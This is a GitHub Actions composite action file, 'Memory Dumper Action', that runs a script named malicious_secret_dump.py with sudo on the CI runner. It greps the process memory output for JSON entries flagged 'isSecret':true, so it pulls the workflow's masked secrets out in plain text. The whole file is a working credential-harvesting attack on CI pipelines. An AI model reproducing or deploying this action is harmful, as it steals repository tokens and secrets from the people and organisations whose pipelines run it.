name: "Memory Dumper Action"
description: "Extracts secrets from memory using malicious_secret_dump.py"
author: "Your Name"
branding:
  icon: "cpu"
  color: "red"
inputs:
  script-path:
    description: "Path to malicious_secret_dump.py"
    required: false
    default: "malicious_secret_dump.py"
outputs:
  secrets:
    description: "Extracted secrets from memory"
runs:
  using: "composite"
  steps:
    - name: Install dependencies
      run: sudo apt update && sudo apt install -y python3
      shell: bash

    - name: Debug file path
      run: |
        echo "Current directory: $(pwd)"
        echo "Listing files in action path:"
        ls -al ${{ github.action_path }}
      shell: bash

    - name: Run memory dumper
      run: |
        sudo python3 ${{ github.action_path }}/malicious_secret_dump.py | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}'
      shell: bash
